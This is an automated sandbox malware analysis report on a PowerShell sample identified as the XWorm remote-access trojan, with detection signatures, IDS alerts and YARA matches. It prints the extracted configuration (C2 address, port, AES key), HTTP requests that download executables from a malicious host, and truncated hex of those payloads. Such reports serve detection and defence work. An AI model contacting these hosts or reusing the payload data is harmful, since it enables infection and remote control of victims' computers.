Windows Analysis Report
185.7.214_1.54.ps1

Overview

General Information

Sample name: 185.7.214_1.54.ps1
Analysis ID: 1614035
MD5: 5ba7043c21494f72d216868f32e70373
SHA1: f0831034083a99ccdc2655d3361da4ed65cec3a1
SHA256: 80a21952b87d83eb419768268b334364ecab48dbb9cbe55b967ba9636e512cab
Tags: 185-7-214-54bookingps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://147.45.44.42/boom/tybwfu.exe Avira URL Cloud: Label: malware
Source: http://147.45.44.42/boom/tqvjt.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.dll Avira: detection malicious, Label: TR/Dropper.Gen7
Found malware configuration
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["185.7.214.54"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp String decryptor: 185.7.214.54
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp String decryptor: 4411
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp String decryptor: P0WER
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm V5.6
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: Binary string: q8C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.pdb source: powershell.exe, 00000000.00000002.1658041352.00000000054CA000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49708 -> 185.7.214.54:4411
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.7.214.54:4411 -> 192.168.2.8:49708
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49708 -> 185.7.214.54:4411
Source: Network traffic Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 185.7.214.54:4411 -> 192.168.2.8:49708
Source: Network traffic Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49708 -> 185.7.214.54:4411
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.7.214.54
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:49708 -> 185.7.214.54:4411
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.8:59056 -> 162.159.36.2:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Feb 2025 07:16:48 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 12 Feb 2025 20:22:05 GMTETag: "7800-62df7b1f2cdc8"Accept-Ranges: bytesContent-Length: 30720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 05 03 87 a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6e 00 00 00 08 00 00 00 00 00 00 5a 8c 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 8c 00 00 4f 00 00 00 00 a0 00 00 f0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 ec 8b 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 6c 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 05 00 00 00 a0 00 00 00 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 8c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 21 00 00 2c 6a 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 2c 05 28 05 00 00 06 2a 1e 02 28 0f 00 00 0a 2a 00 00 13 30 05 00 5f 00 00 00 01 00 00 11 02 28 10 00 00 0a 0a 28 11 00 00 0a 03 6f 12 00 00 0a 0b 06 8e 69 8d 15 00 00 01 0c 16 0d 2b 2d 08 09 06 09 91 09 20 e5 00 00 00 5a 20 00 01 00 00 5d d2 61 d2 9c 08 09 8f 15 00 00 01 25 47 07 09 07 8e 69 5d 91 61 d2 52 09 17 58 0d 09 06 8e 69 32 cd 28 11 00 00 0a 08 6f 13 00 00 0a 2a 1e 02 28 0f 00 00 0a 2a 00 13 30 07 00 9e 00 00 00 02 00 00 11 72 01 00 00 70 0a 73 14 00 00 0a 73 15 00 00 0a 0b 07 6f 16 00 00 0a 72 fe 5f 00 70 7e 01 00 00 04 28 03 00 00 06 6f 17 00 00 0a 26 07 6f 16 00 00 0a 72 20 60 00 70 7e 01 00 00 04 28 03 00 00 06 6f 17 00 00 0a 26 07 17 6f 18 00 00 0a 07 17 8d 18 00 00 01 25 16 06 7e 01 00 00 04 28 03 00 00 06 a2 6f 19 00 00 0a 6f 1a 00 00 0a 72 4a 60 00 70 7e 01 00 00 04 28 03 00 00 06 6f 1b 00 00 0a 72 6c 60 00 70 7e 01 00 00 04 28 03 00 00 06 6f 1c 00 00 0a 14 14 6f 1d 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Feb 2025 07:16:49 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 12 Feb 2025 20:14:40 GMTETag: "8200-62df7976c8552"Accept-Ranges: bytesContent-Length: 33280Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5e f8 ac 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 6e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 97 00 00 4f 00 00 00 00 a0 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 77 00 00 00 20 00 00 00 78 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 97 00 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 4f 00 00 f0 47 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00 00 1b 2d 0a 28 01 00 00 2b 0a 2b 06 2b 04 02 0a 2b 00 06 2a 13 30 02 00 10 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /boom/tybwfu.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /boom/tqvjt.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 147.45.44.42 147.45.44.42
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DELUNETDE DELUNETDE
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: global traffic HTTP traffic detected: GET /boom/tybwfu.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /boom/tqvjt.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42
Source: powershell.exe, 00000000.00000002.1658041352.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1658041352.0000000005476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.42
Source: powershell.exe, 00000000.00000002.1658041352.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1670924043.00000000081B0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000004.00000003.1649061589.0000000004C02000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1649027444.0000000004BF2000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.1650897778.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1648911485.0000000004C02000.00000004.00000020.00020000.00000000.sdmp, xe5lczmk.dll.4.dr, xe5lczmk.0.cs.0.dr String found in binary or memory: http://147.45.44.42/boom/tqvjt.exe
Source: csc.exe, 00000004.00000003.1650063615.00000000068B1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.42/boom/tqvjt.exe0
Source: powershell.exe, 00000000.00000002.1658041352.0000000004A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.42/boom/tybwfu.exe
Source: powershell.exe, 00000000.00000002.1667942190.0000000006F0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft1
Source: powershell.exe, 00000000.00000002.1662321741.0000000005989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1658041352.0000000004A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1658041352.0000000004921000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4098300362.0000000002D31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1658041352.0000000004A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1658041352.0000000004921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.1662321741.0000000005989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1662321741.0000000005989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1662321741.0000000005989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1658041352.0000000004A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1658041352.0000000004A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1662321741.0000000005989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.55484c4.1.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.55484c4.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.5538044.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.5538044.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.5538044.3.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.5538044.3.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.5533988.4.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.5533988.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.54caf50.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.54caf50.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.4095873239.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1658041352.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
.NET source code contains very large strings
Source: 0.2.powershell.exe.70a0000.6.raw.unpack, n5Dh00mp5s.cs Long String: Length: 12284
Source: 0.2.powershell.exe.54caf50.0.raw.unpack, n5Dh00mp5s.cs Long String: Length: 12284
Source: 0.2.powershell.exe.54bbe38.2.raw.unpack, n5Dh00mp5s.cs Long String: Length: 12284
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_011EB038 7_2_011EB038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_011E6348 7_2_011E6348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_011E84B8 7_2_011E84B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_011E5670 7_2_011E5670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_011E5328 7_2_011E5328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_011E0BA0 7_2_011E0BA0
Yara signature match
Source: dump.pcap, type: PCAP Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.55484c4.1.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.55484c4.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.5538044.3.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.5538044.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.5538044.3.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.5538044.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.5533988.4.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.5533988.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.54caf50.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.54caf50.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1658041352.0000000005548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
